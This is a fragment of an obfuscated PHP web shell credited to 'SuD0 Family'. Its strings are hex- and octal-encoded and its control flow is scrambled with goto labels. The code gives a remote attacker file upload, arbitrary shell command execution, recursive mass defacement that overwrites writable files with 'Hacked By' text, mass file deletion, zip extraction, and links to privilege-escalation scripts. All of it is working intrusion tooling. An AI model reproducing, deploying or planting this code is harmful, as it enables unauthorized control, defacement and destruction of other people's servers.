"\74\x6c\151\76\x5b\x20\x3c\141\x20\150\162\x65\146\75\47\x3f\x64\x69\162\75{$dir}\46\144\157\x3d\x66\141\153\x65\137\x72\x6f\157\164\47\x3e\106\141\153\145\x20\122\157\157\x74\x3c\x2f\141\x3e\x20\135\x3c\57\x6c\151\x3e"; goto qJRhe; FbEMB: echo "\74\143\145\x6e\164\145\162\76\x3c\150\x72\x3e\x3c\x66\157\x72\155\76\xa\x3c\163\x65\154\x65\x63\164\40\157\156\143\x68\141\x6e\147\x65\x3d\47\x69\x66\x20\50\164\x68\151\x73\56\x76\141\154\165\145\51\40\167\x69\x6e\144\x6f\167\56\157\160\x65\156\50\164\150\x69\163\56\x76\141\x6c\165\x65\x29\x3b\x27\76\xa\x20\x20\x20\74\x6f\x70\x74\151\157\156\x20\x73\x65\x6c\145\143\164\x65\144\75\47\163\x65\154\x65\x63\164\145\x64\47\x20\x76\141\154\165\145\75\x27\47\76\x20\105\156\165\x5f\163\143\x72\151\160\x74\x73\40\x3c\x2f\157\x70\x74\151\157\x6e\76\12\40\x20\40\74\x6f\160\x74\151\157\x6e\x20\166\141\154\x75\x65\x3d\x27{$ling}\x3d\154\163\x65\47\x3e\x6c\x73\x65\x20\163\x63\x72\x69\160\x74\74\x2f\x6f\x70\164\151\x6f\x6e\76\12\40\40\40\74\157\x70\164\x69\x6f\156\x20\166\x61\154\x75\x65\x3d\x27{$ling}\75\x70\162\x69\166\x61\164\145\47\x3e\x4c\x69\156\165\x78\x20\120\x72\151\x76\x61\164\145\x2d\x69\x3c\x2f\157\160\164\151\157\x6e\x3e\xa\40\40\x20\74\157\x70\164\x69\157\x6e\40\x76\141\154\x75\145\75\x27{$ling}\75\160\145\x61\x73\163\55\156\147\x27\x3e\160\145\x61\163\163\55\156\147\x20\x73\143\x72\x69\160\164\74\x2f\x6f\x70\x74\151\157\x6e\76\xa\40\40\x20\74\157\x70\164\x69\x6f\156\x20\166\141\154\x75\145\75\47{$ling}\75\154\145\163\x27\76\114\x69\x6e\165\170\40\x45\170\x70\x6c\157\x69\x74\40\123\x75\147\147\145\x73\164\x65\162\x3c\x2f\157\160\164\151\x6f\156\x3e\x20\x20\x20\12\40\x20\40\74\157\x70\x74\151\x6f\156\x20\166\x61\154\165\145\x3d\47{$ling}\x3d\x62\x61\x73\150\141\x72\153\47\76\x62\x61\163\150\x61\x72\x6b\40\x65\x6e\165\40\163\x63\162\x69\x70\164\x3c\x2f\157\160\164\151\x6f\x6e\x3e\x20\40\x20\40\x20\12\x20\40\40\x3c\157\x70\164\151\x6f\156\40\166\141\154\x75\145\75\47{$ling}\x3d\x4c\x69\x6e\105\156\x75\47\76\114\151\x6e\x45\x6e\x75\x20\163\x63\162\x69\160\164\x3c\x2f\x6f\x70\164\x69\x6f\156\x3e\x20\x20\x20\40\12\40\x20\40\xa\x3c\x2f\163\x65\x6c\x65\143\164\x3e\12\12\74\156\157\x73\x63\162\x69\160\164\76\x3c\151\x6e\160\165\164\40\x74\171\x70\145\x3d\x27\163\165\142\x6d\x69\x74\47\x20\166\x61\x6c\x75\x65\x3d\x27\x53\165\x62\155\151\x74\x27\76\x3c\57\x6e\x6f\x73\x63\162\151\x70\164\x3e\12\x3c\x2f\146\x6f\162\x6d\x3e\103\157\x70\171\162\151\147\150\x74\x20\46\143\x6f\x70\171\73\40" . date("\131") . "\40\x2d\40\x3c\x61\x20\150\x72\x65\x66\x3d\x27\x68\x74\x74\x70\163\72\x2f\x2f\163\x75\144\157\137\146\x61\155\151\x6c\171\56\157\x72\147\x2f\x27\x20\164\141\x72\x67\x65\164\75\47\x5f\142\154\x61\x6e\153\x27\x3e\x3c\x66\157\156\x74\40\143\157\154\x6f\x72\x3d\x6c\151\155\x65\x3e\x53\x75\x44\60\x20\106\141\x6d\x69\x6c\171\74\x2f\146\157\156\164\x3e\74\x2f\x61\x3e\x20\74\x2f\143\x65\x6e\x74\145\162\76"; goto Lule7; bhf0C: echo "\x3c\154\151\76\133\x20\74\141\40\x68\x72\x65\146\x3d\x27\77\144\151\162\75{$dir}\x26\144\x6f\x3d\152\x75\155\160\x69\x6e\x67\47\76\x4a\165\155\x70\x69\x6e\147\x3c\57\141\x3e\x20\x5d\x3c\x2f\x6c\151\76"; goto Dw0eC; zOQmB: echo "\x3c\57\143\145\x6e\x74\145\162\76"; goto FrCPJ; WEwD7: $curl = function_exists("\143\x75\x72\154\137\x76\x65\x72\163\151\x6f\x6e") ? "\x3c\x66\x6f\156\164\x20\x63\x6f\154\x6f\x72\x3d\x6c\x69\x6d\x65\x3e\117\116\x3c\x2f\x66\x6f\x6e\x74\76" : "\74\146\x6f\156\x74\x20\143\157\154\x6f\162\75\x72\x65\x64\76\117\106\x46\x3c\57\146\x6f\x6e\x74\76"; goto pPSA4; X2ZwW: if (isset($_GET["\144\x69\x72"])) { $dir = $_GET["\x64\x69\x72"]; chdir($_GET["\x64\x69\162"]); } else { $dir = getcwd(); } goto lFDuc; Y4IOJ: $mysql = function_exists("\x6d\171\163\161\154\137\143\157\x6e\x6e\145\x63\164") ? "\x3c\x66\157\156\x74\x20\x63\x6f\x6c\x6f\x72\75\154\151\155\145\76\117\x4e\x3c\x2f\x66\157\x6e\x74\76" : "\74\x66\157\156\x74\x20\143\157\154\157\x72\75\162\x65\x64\76\117\106\106\x3c\57\146\x6f\x6e\164\x3e"; goto WEwD7; HMHCF: if ($_GET["\x64\x6f"] == "\x75\160\154\x6f\x61\144") { echo "\74\143\145\x6e\164\x65\x72\x3e"; if ($_POST["\165\x70\x6c\x6f\141\144"]) { if (@copy($_FILES["\x69\x78\x5f\x66\151\x6c\x65"]["\x74\155\x70\137\x6e\141\x6d\x65"], "{$dir}\x2f" . $_FILES["\x69\x78\137\x66\x69\x6c\x65"]["\x6e\x61\x6d\145"] . '')) { $act = "\x3c\146\x6f\x6e\x74\x20\x63\x6f\154\x6f\162\x3d\x6c\151\x6d\145\x3e\125\x70\154\x6f\x61\144\145\x64\x21\x3c\x2f\x66\157\x6e\x74\76\40\x61\164\x20\74\151\x3e\74\x62\76{$dir}\57" . $_FILES["\151\x78\137\x66\151\154\x65"]["\x6e\141\x6d\145"] . "\x3c\x2f\142\x3e\x3c\x2f\151\x3e"; } else { $act = "\x3c\146\x6f\156\164\x20\x63\x6f\154\157\x72\x3d\x72\145\144\76\x66\141\x69\154\x65\144\x20\x74\x6f\40\x75\160\x6c\x6f\141\x64\40\146\151\154\x65\x3c\57\146\x6f\156\x74\76"; } } echo "\125\160\154\157\x61\144\40\106\151\154\145\x3a\x20\133\x20" . w($dir, "\x57\162\151\164\145\141\142\154\145") . "\x20\135\x3c\x66\157\x72\155\40\x6d\145\164\150\157\x64\75\x27\x70\x6f\x73\x74\x27\x20\x65\156\143\x74\171\160\145\x3d\x27\155\165\154\164\x69\x70\x61\x72\x74\57\146\157\x72\x6d\x2d\144\141\164\141\47\x3e\x3c\151\x6e\160\165\164\x20\164\171\160\x65\x3d\x27\146\151\x6c\x65\x27\40\x6e\141\x6d\145\x3d\47\x69\170\x5f\146\x69\154\x65\x27\76\x3c\x69\156\x70\165\x74\x20\164\x79\160\x65\x3d\x27\x73\165\142\155\151\x74\x27\x20\x76\x61\154\165\x65\x3d\47\x75\x70\154\157\x61\x64\x27\x20\156\141\155\x65\75\47\x75\x70\x6c\157\141\x64\47\76\74\57\x66\157\x72\x6d\x3e"; echo $act; echo "\74\x2f\143\145\156\164\145\x72\76"; } elseif ($_GET["\x64\157"] == "\x63\155\x64") { echo "\74\146\x6f\x72\155\x20\x6d\x65\x74\x68\157\x64\75\47\x70\157\x73\x74\47\76\12\11\x3c\x66\157\156\x74\x20\x73\164\171\154\145\x3d\47\164\145\170\x74\x2d\144\x65\143\157\x72\141\x74\151\157\156\x3a\x20\165\156\144\x65\162\154\x69\156\x65\x3b\x27\76" . $user . "\100" . gethostbyname($_SERVER["\x48\124\x54\120\137\x48\x4f\123\124"]) . "\x3a\x7e\43\40\74\57\x66\x6f\156\x74\x3e\xa\x9\74\151\x6e\160\x75\x74\40\x74\171\160\x65\x3d\47\164\x65\170\x74\47\x20\163\x69\172\x65\75\x27\x33\x30\x27\x20\150\x65\x69\x67\x68\x74\x3d\x27\61\x30\47\x20\x6e\x61\155\x65\75\47\x63\x6d\x64\47\x3e\x3c\x69\156\x70\165\x74\40\x74\171\x70\x65\x3d\x27\163\x75\142\155\151\164\x27\40\156\x61\x6d\x65\x3d\47\x64\x6f\137\x63\155\x64\47\x20\x76\x61\154\x75\145\75\x27\x3e\76\x27\x3e\xa\x9\x3c\x2f\x66\157\x72\x6d\76"; if ($_POST["\144\157\x5f\x63\155\x64"]) { echo "\74\160\162\x65\76" . exe($_POST["\x63\x6d\x64"]) . "\74\x2f\160\x72\145\76"; } } elseif ($_GET["\144\157"] == "\x6d\141\163\x73\x5f\x64\145\x66\x61\143\145") { echo "\x3c\143\145\x6e\164\145\x72\x3e\74\x66\157\162\x6d\x20\141\x63\x74\x69\x6f\156\x3d\x22\42\40\x6d\x65\x74\x68\x6f\144\75\x22\160\x6f\x73\x74\x22\x3e\12"; $dirr = $_POST["\144\137\144\x69\162"]; $index = $_POST["\x73\143\162\x69\160\x74"]; $index = str_replace("\x22", "\47", $index); $index = stripslashes($index); function edit_file($file, $index) { if (is_writable($file)) { clear_fill($file, $index); echo "\74\x53\x70\141\156\x20\x73\164\171\x6c\x65\x3d\47\143\x6f\154\157\162\x3a\147\x72\145\145\x6e\x3b\47\76\x3c\163\164\162\157\156\x67\76\x20\133\53\135\40\x4e\x79\x61\142\165\156\40\61\x30\x30\x25\x20\x53\x75\143\x63\x65\x73\x73\146\x75\154\154\40\74\57\x73\164\162\157\x6e\x67\76\74\57\x73\x70\141\x6e\76\x3c\x62\x72\x3e\74\57\143\145\156\164\145\x72\76"; } else { echo "\74\123\160\141\156\40\x73\164\171\154\145\75\x27\143\157\154\157\x72\x3a\x72\145\144\x3b\47\x3e\74\163\x74\x72\x6f\x6e\147\76\40\133\55\x5d\x20\124\145\x72\156\x79\141\164\x61\40\124\151\x64\141\153\40\102\157\154\145\150\40\x4d\x65\x6e\171\x61\142\x75\x6e\40\x44\x69\x73\151\x6e\151\40\72\50\40\x3c\x2f\x73\x74\162\157\156\147\x3e\74\57\x73\160\x61\156\x3e\74\x62\162\76\x3c\x2f\x63\x65\156\164\145\x72\76"; } } function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\x2f" . $namafile; if ($dirb === "\x2e") { if (file_exists("{$dir}\x2f{$namafile}")) { unlink("{$dir}\57{$namafile}"); } } elseif ($dirb === "\56\x2e") { if (file_exists('' . dirname($dir) . "\57{$namafile}")) { unlink('' . dirname($dir) . "\x2f{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "\133\74\x66\157\156\x74\x20\143\x6f\x6c\157\x72\75\x6c\x69\x6d\x65\76\x44\x45\114\105\124\x45\104\74\x2f\x66\157\156\x74\76\x5d\40{$lokasi}\74\142\x72\x3e"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } function clear_fill($file, $index) { if (file_exists($file)) { $handle = fopen($file, "\x77"); fwrite($handle, ''); fwrite($handle, $index); fclose($handle); } } function gass() { global $dirr, $index; chdir($dirr); $me = str_replace(dirname(__FILE__) . "\57", '', __FILE__); $files = scandir($dirr); $notallow = array("\x2e\x68\164\141\143\143\145\x73\x73", "\x65\162\x72\157\162\x5f\x6c\157\147", "\x5f\166\x74\151\137\x69\156\x66\x2e\150\164\x6d\154", "\137\x70\162\151\166\141\164\145", "\x5f\166\164\x69\137\142\x69\x6e", "\x5f\x76\164\151\x5f\x63\x6e\x66", "\137\166\x74\151\137\x6c\x6f\147", "\137\x76\x74\x69\x5f\160\x76\x74", "\x5f\166\164\x69\x5f\x74\x78\x74", "\143\x67\x69\x2d\x62\x69\156", "\x2e\x63\x6f\156\x74\141\x63\x74\145\x6d\141\x69\154", "\x2e\143\x70\x61\156\x65\154", "\56\146\141\156\164\x61\x73\164\x69\143\x6f\144\141\x74\x61", "\x2e\150\164\160\x61\163\163\167\x64\x73", "\x2e\x6c\x61\163\164\154\157\x67\151\156", "\141\143\143\145\x73\163\55\154\157\x67\x73", "\x63\160\142\141\x63\153\165\x70\55\x65\x78\x63\154\x75\144\x65\x2d\x75\x73\145\144\x2d\x62\171\55\142\x61\143\x6b\x75\x70\56\x63\157\x6e\x66", "\56\x63\x67\151\x5f\x61\165\x74\x68", "\x2e\144\151\x73\153\x5f\165\163\x61\147\x65", "\56\x73\x74\141\164\163\160\167\144", "\x2e\56", "\x2e"); sort($files); $n = 0; foreach ($files as $file) { if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) { echo "\x3c\x63\x65\156\164\x65\162\x3e\74\x53\160\x61\x6e\x20\x73\x74\171\x6c\145\x3d\47\143\157\154\157\x72\x3a\x20\43\x38\x41\x38\101\70\101\73\47\x3e\74\x73\x74\x72\157\156\x67\x3e{$dirr}\57\74\57\x73\x70\x61\156\x3e{$file}\74\x2f\163\x74\x72\x6f\x6e\x67\x3e\x20\75\x3d\x3d\x3d\76\40"; edit_file($file, $index); flush(); $n = $n + 1; } } echo "\x3c\142\x72\76"; echo "\74\x63\145\156\164\145\x72\76\74\142\x72\x3e\x3c\150\63\76{$n}\40\113\141\x6c\x69\40\101\156\144\141\40\x54\145\154\141\x68\40\116\x67\x65\143\x72\157\x74\40\40\x44\x69\x73\x69\156\x69\x20\74\57\x68\63\76\x3c\x2f\x63\x65\156\164\x65\162\x3e\74\142\162\76"; } function ListFiles($dirrall) { if ($dh = opendir($dirrall)) { $files = array(); $inner_files = array(); $me = str_replace(dirname(__FILE__) . "\57", '', __FILE__); $notallow = array($me, "\x2e\150\x74\x61\x63\143\145\163\163", "\x65\162\x72\x6f\x72\137\x6c\x6f\147", "\137\x76\164\x69\x5f\x69\x6e\x66\x2e\x68\164\155\154", "\137\x70\162\151\166\x61\164\x65", "\x5f\166\x74\151\137\x62\151\x6e", "\x5f\x76\164\x69\137\143\156\146", "\137\x76\x74\x69\x5f\x6c\157\147", "\x5f\166\x74\x69\137\x70\x76\x74", "\x5f\x76\164\x69\137\x74\170\164", "\143\147\x69\x2d\x62\151\x6e", "\56\143\x6f\156\164\x61\x63\x74\x65\x6d\x61\151\x6c", "\x2e\143\160\x61\156\x65\154", "\56\x66\141\x6e\x74\x61\163\164\151\143\x6f\144\x61\x74\141", "\x2e\x68\164\160\141\x73\x73\167\144\x73", "\56\154\x61\x73\164\154\x6f\x67\x69\x6e", "\141\x63\143\145\x73\x73\55\x6c\157\x67\163", "\143\x70\142\x61\x63\x6b\x75\x70\x2d\145\170\143\154\165\x64\145\x2d\165\x73\145\144\x2d\142\x79\55\142\141\143\x6b\x75\160\x2e\143\157\x6e\x66", "\56\x63\147\x69\137\141\165\164\x68", "\x2e\144\x69\x73\x6b\x5f\165\163\x61\147\x65", "\x2e\163\x74\x61\x74\x73\x70\x77\x64", "\x54\x68\165\x6d\x62\x73\56\x64\142"); while ($file = readdir($dh)) { if ($file != "\x2e" && $file != "\x2e\x2e" && $file[0] != "\x2e" && !in_array($file, $notallow)) { if (is_dir($dirrall . "\57" . $file)) { $inner_files = ListFiles($dirrall . "\57" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dirrall . "\57" . $file); } } } closedir($dh); return $files; } } function gass_all() { global $index; $dirrall = $_POST["\x64\137\144\x69\x72"]; foreach (ListFiles($dirrall) as $key => $file) { $file = str_replace("\x2f\57", "\x2f", $file); echo "\74\x63\x65\156\164\x65\162\76\74\x73\164\x72\x6f\156\x67\x3e{$file}\x3c\57\x73\x74\x72\157\156\147\x3e\40\x3d\75\75\76"; edit_file($file, $index); flush(); } $key = $key + 1; echo "\74\x63\x65\156\164\145\x72\x3e\74\142\162\76\74\x68\x33\76{$key}\x20\113\141\154\151\40\x41\156\144\141\x20\x54\x65\x6c\141\x68\40\x4e\147\145\143\162\157\x74\40\x20\x44\151\x73\151\156\x69\x20\x20\x3c\x2f\x68\x33\76\x3c\57\143\145\156\164\145\162\x3e\x3c\142\162\x3e"; } function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\x2e") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\x2e") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\133\x3c\146\x6f\x6e\x74\x20\143\157\154\x6f\162\75\154\x69\155\145\76\104\x4f\116\105\74\x2f\x66\157\x6e\164\x3e\135\40{$lokasi}\x3c\x62\162\x3e"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } if ($_POST["\155\x61\163\163"] == "\157\156\x65\x64\151\162") { echo "\74\142\162\x3e\40\x56\145\x72\163\x69\x20\124\145\170\164\40\101\x72\145\x61\x3c\142\162\x3e\x3c\164\145\x78\x74\x61\x72\x65\x61\x20\163\x74\x79\x6c\145\x3d\47\142\141\x63\153\147\x72\157\165\156\x64\72\x62\x6c\141\143\x6b\x3b\x6f\165\x74\154\151\156\x65\x3a\x6e\x6f\156\145\73\143\x6f\x6c\157\162\72\x72\x65\x64\x3b\x27\40\156\141\x6d\x65\x3d\x27\x69\156\144\x65\x78\x27\x20\x72\157\167\163\75\x27\x31\60\x27\x20\143\x6f\x6c\x73\75\x27\x36\67\47\x3e\xa"; $ini = "\x68\x74\x74\160\72\x2f\x2f"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}\x2f{$file}", "\x77\x2b"); $finish = @fwrite($start, $indx); if ($finish) { echo "{$ini}{$row}\57{$file}\xa"; } } echo "\x3c\57\164\x65\x78\164\141\x72\x65\x61\x3e\74\x62\162\76\74\142\x72\x3e\x3c\x62\162\76\x3c\x62\76\126\145\x72\163\x69\40\124\x65\170\164\74\57\142\76\x3c\142\162\x3e\74\142\x72\x3e\74\142\x72\76\12"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}\57{$file}", "\x77\x2b"); $finish = @fwrite($start, $indx); if ($finish) { echo "\74\141\40\150\x72\145\x66\75\42\150\164\164\160\72\57\x2f" . $row . "\57" . $file . "\x22\x20\x74\x61\162\x67\x65\x74\x3d\x22\137\x62\x6c\141\156\153\42\x3e\150\x74\164\160\x3a\57\x2f" . $row . "\x2f" . $file . "\74\57\x61\76\74\x62\162\x3e"; } } } elseif ($_POST["\155\141\x73\x73"] == "\163\141\142\x75\x6e\x6b\x61\142\x65\x68") { gass(); } elseif ($_POST["\x6d\x61\x73\163"] == "\x68\141\160\165\163\155\141\x73\163\x61\x6c") { hapus_massal($_POST["\144\x5f\144\x69\x72"], $_POST["\144\x5f\146\151\154\145"]); } elseif ($_POST["\155\141\163\163"] == "\x73\x61\142\x75\156\155\145\155\141\x74\x69\153\x61\156") { gass_all(); } elseif ($_POST["\x6d\x61\x73\163"] == "\x6d\141\163\163\x64\x65\x66\x61\143\x65") { echo "\74\x64\x69\x76\40\163\x74\171\154\145\x3d\x27\x6d\x61\162\147\151\x6e\x3a\x20\x35\x70\x78\40\x61\165\x74\x6f\73\40\160\141\144\x64\151\156\147\72\40\x35\160\x78\x27\76"; sabun_massal($_POST["\144\x5f\144\151\x72"], $_POST["\x64\137\x66\x69\154\x65"], $_POST["\x73\x63\162\151\x70\x74"]); echo "\x3c\x2f\144\151\x76\x3e"; } else { echo "\xa\11\x9\x3c\x63\x65\156\x74\145\162\76\74\146\157\x6e\164\x20\163\x74\x79\154\145\x3d\x27\x74\x65\x78\164\x2d\144\x65\143\157\162\x61\164\x69\x6f\x6e\72\40\x75\156\x64\145\x72\x6c\151\156\145\x3b\47\x3e\12\x9\x9\123\145\154\x65\x63\x74\40\124\x79\160\145\72\x3c\x62\162\x3e\12\11\x9\x3c\57\x66\157\156\164\76\xa\x9\11\x3c\x73\x65\154\x65\x63\164\x20\x63\154\141\x73\x73\x3d\42\x73\x65\x6c\145\143\x74\42\x20\x6e\x61\155\x65\75\42\x6d\x61\x73\163\x22\40\x20\x73\164\x79\x6c\x65\x3d\x22\167\x69\x64\164\150\x3a\x20\x34\65\60\160\170\73\x22\x20\150\x65\x69\147\x68\164\x3d\x22\x31\x30\x22\x3e\12\11\11\x3c\157\x70\x74\x69\x6f\x6e\40\x76\x61\x6c\x75\145\x3d\42\x6f\156\145\144\151\162\42\76\x4d\x61\x73\163\x20\x44\x65\146\141\x63\145\40\x31\x20\x44\151\162\74\x2f\157\160\164\151\x6f\x6e\x3e\12\x9\x9\x3c\157\x70\164\151\157\x6e\40\x76\x61\154\x75\145\x3d\42\155\x61\x73\163\144\145\x66\141\x63\x65\42\x3e\115\141\x73\x73\x20\104\x65\x66\x61\143\x65\x20\x41\114\114\40\x44\x69\162\74\57\157\x70\164\151\157\x6e\x3e\12\x9\x9\74\x6f\160\164\151\x6f\156\40\x76\x61\x6c\x75\145\75\x22\x73\x61\142\165\156\153\x61\x62\145\150\42\76\x53\x61\142\x75\x6e\x20\x4d\x61\x73\163\141\154\x20\104\151\40\124\x65\155\160\x61\164\74\x2f\x6f\x70\164\x69\x6f\156\76\xa\11\x9\74\157\160\164\x69\x6f\156\40\166\x61\154\165\x65\75\42\x73\x61\142\x75\x6e\155\x65\155\141\164\151\x6b\x61\x6e\42\x3e\x53\x61\142\x75\156\x20\115\x61\x73\x73\141\154\x20\102\x75\x6e\165\x68\x20\104\151\x72\x69\x3c\57\157\160\x74\151\x6f\156\76\xa\x9\x9\x3c\x6f\x70\164\x69\157\x6e\x20\166\x61\154\165\x65\75\42\x68\141\x70\x75\x73\155\x61\x73\163\x61\x6c\42\x3e\x4d\x61\163\163\x20\104\145\x6c\145\x74\x65\40\106\151\x6c\145\x73\x3c\x2f\157\x70\x74\151\x6f\x6e\x3e\x3c\x2f\x63\145\156\x74\x65\x72\x3e\x3c\x2f\x73\x65\154\x65\143\164\x3e\74\x62\162\76\xa\x9\11\74\x66\x6f\x6e\x74\x20\163\164\x79\154\145\75\47\x74\145\x78\164\55\x64\145\x63\157\162\141\x74\151\157\x6e\x3a\x20\x75\x6e\x64\145\x72\x6c\151\x6e\145\x3b\x27\x3e\106\157\154\144\145\162\x3a\74\57\146\x6f\156\x74\76\74\x62\162\x3e\12\x9\x9\74\x69\x6e\x70\165\164\x20\164\171\160\x65\x3d\47\164\x65\170\164\47\x20\x6e\x61\155\x65\75\47\144\137\x64\151\162\x27\40\166\x61\x6c\165\x65\x3d\47{$dir}\47\40\x73\x74\x79\x6c\145\x3d\47\167\x69\144\164\x68\72\x20\64\65\x30\160\170\73\47\40\x68\145\x69\147\150\164\x3d\x27\61\x30\47\x3e\74\142\x72\x3e\xa\11\x9\x3c\146\157\x6e\x74\x20\x73\x74\x79\x6c\x65\75\47\x74\x65\170\164\55\144\145\x63\157\162\x61\x74\x69\x6f\x6e\72\x20\165\x6e\x64\x65\x72\x6c\151\x6e\145\73\x27\x3e\x46\151\154\x65\x6e\x61\x6d\x65\72\x3c\x2f\x66\157\156\164\x3e\x3c\x62\162\x3e\xa\x9\x9\x3c\151\x6e\160\165\164\40\x74\171\x70\145\75\47\164\145\170\164\x27\40\x6e\141\x6d\145\75\x27\x64\x5f\x66\151\x6c\145\x27\x20\166\141\154\x75\145\75\47\x68\x61\143\153\x65\144\137\x62\171\x5f\x73\x2e\160\x68\x70\47\x20\163\x74\171\x6c\x65\x3d\x27\x77\151\144\x74\x68\x3a\40\x34\x35\60\160\x78\73\47\40\150\x65\x69\147\x68\164\75\47\61\x30\47\76\x3c\x62\x72\76\12\11\x9\74\146\157\x6e\164\40\x73\x74\171\154\x65\75\47\164\x65\x78\x74\55\x64\x65\143\157\x72\141\164\151\157\x6e\72\x20\x75\156\x64\x65\x72\154\151\156\x65\73\x27\76\111\x6e\x64\x65\x78\40\106\x69\x6c\145\72\x3c\x2f\x66\x6f\x6e\164\x3e\x3c\142\x72\x3e\12\x9\x9\74\164\x65\170\164\141\162\145\x61\x20\156\141\x6d\x65\x3d\47\x73\x63\162\x69\x70\164\x27\x20\x73\164\171\154\145\75\x27\x77\x69\144\164\150\x3a\x20\x34\65\60\160\170\73\x20\150\x65\151\x67\150\164\72\40\62\60\60\160\x78\73\143\x6f\x6c\157\x72\72\40\162\145\x64\73\x27\x3e\x48\141\x63\x6b\x65\144\x20\102\171\40\x53\x75\104\x6f\x20\106\141\x6d\151\154\171\74\57\164\145\170\x74\141\x72\145\x61\x3e\74\x62\162\x3e\xa\11\x9\x3c\151\x6e\x70\165\164\40\164\x79\160\145\75\47\163\165\142\155\x69\164\x27\x20\x6e\141\155\x65\x3d\47\x73\x74\141\x72\x74\47\x20\166\x61\x6c\165\x65\x3d\47\115\141\163\x73\x20\x44\145\146\x61\143\145\47\x20\163\164\x79\x6c\x65\75\47\167\x69\x64\x74\150\72\x20\x34\x35\x30\160\x78\73\47\76\12\11\x9\74\x2f\x66\x6f\x72\155\76\74\57\x63\145\x6e\164\145\x72\x3e"; } } elseif ($_GET["\144\157"] == "\172\151\160") { echo "\74\143\145\156\164\x65\162\x3e\x3c\x68\x31\76\132\x69\160\40\x4d\x65\156\165\74\x2f\150\61\x3e"; function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("\x2e" === $file || "\56\x2e" === $file) { continue; } if (is_dir("{$dir}\57{$file}")) { rmdir_recursive("{$dir}\x2f{$file}"); } else { unlink("{$dir}\x2f{$file}"); } } rmdir($dir); } if ($_FILES["\x7a\151\x70\x5f\146\x69\154\x65"]["\156\x61\155\145"]) { $filename = $_FILES["\x7a\151\x70\x5f\x66\151\x6c\145"]["\156\141\155\x65"]; $source = $_FILES["\x7a\151\160\137\x66\151\x6c\145"]["\x74\155\x70\x5f\x6e\141\x6d\x65"]; $type = $_FILES["\x7a\x69\x70\x5f\x66\x69\x6c\x65"]["\x74\171\x70\145"]; $name = explode("\56", $filename); $accepted_types = array("\141\x70\x70\154\151\x63\141\x74\x69\x6f\156\57\172\x69\x70", "\x61\160\160\154\151\x63\141\164\151\x6f\x6e\57\x78\55\172\x69\x70\55\x63\157\x6d\x70\162\x65\163\x73\x65\144", "\155\165\x6c\164\151\160\141\162\x74\x2f\x78\55\172\x69\160", "\x61\x70\x70\x6c\x69\x63\141\x74\151\x6f\156\57\x78\55\143\157\155\160\162\145\163\x73\145\144"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "\172\151\160" ? true : false; if (!$continue) { $message = "\x49\x74\x75\x20\x42\165\153\141\156\x20\x5a\x69\x70\x20\x20\x2c\40\54\x20\x47\117\x42\x4c\x4f\113\x20\x43\x4f\113"; } $path = dirname(__FILE__) . "\x2f"; $filenoext = basename($filename, "\56\x7a\x69\x70"); $filenoext = basename($filenoext, "\56\132\111\120"); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } mkdir($targetdir, 511); if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "\x3c\142\x3e\x53\x75\x6b\x73\x65\163\40\107\x61\x6e\40\x3a\51\74\x2f\142\76"; } else { $message = "\74\142\76\105\x72\162\x6f\162\40\x47\x61\x6e\40\72\50\74\x2f\x62\76"; } } echo "\x3c\164\x61\142\x6c\145\x20\x73\164\x79\154\145\x3d\42\x77\x69\x64\164\150\72\x31\60\x30\45\x22\x20\x62\x6f\x72\x64\x65\162\75\42\x31\x22\x3e\12\40\40\x3c\x74\x72\76\74\x74\x64\x3e\x3c\150\x32\76\125\160\154\157\141\x64\40\101\156\144\x20\125\x6e\172\151\x70\74\57\150\62\x3e\x3c\146\x6f\x72\155\x20\145\x6e\x63\x74\x79\x70\x65\x3d\42\155\x75\x6c\164\151\160\141\162\x74\57\146\157\162\x6d\55\144\141\x74\141\x22\40\155\145\164\x68\x6f\x64\x3d\42\x70\x6f\163\164\x22\40\x61\143\x74\x69\157\x6e\75\x22\42\x3e\12\x3c\154\x61\142\x65\154\x3e\132\151\160\40\106\151\x6c\x65\40\x3a\x20\74\x69\x6e\160\165\164\40\x74\171\160\145\75\42\146\151\x6c\x65\x22\40\156\141\155\x65\75\42\172\151\x70\x5f\146\151\154\x65\x22\x20\x2f\76\74\x2f\154\141\x62\x65\x6c\x3e\12\74\x69\x6e\160\x75\x74\40\x74\x79\160\145\x3d\42\x73\x75\x62\x6d\151\x74\x22\40\156\141\155\145\x3d\x22\x73\165\x62\155\151\164\x22\x20\x76\x61\154\165\145\75\x22\125\160\154\157\x61\144\40\101\156\x64\x20\125\156\x7a\151\x70\x22\x20\57\76\12\x3c\57\x66\x6f\162\x6d\x3e"; if ($message) { echo "\74\x70\x3e{$message}\x3c\57\160\76"; } echo 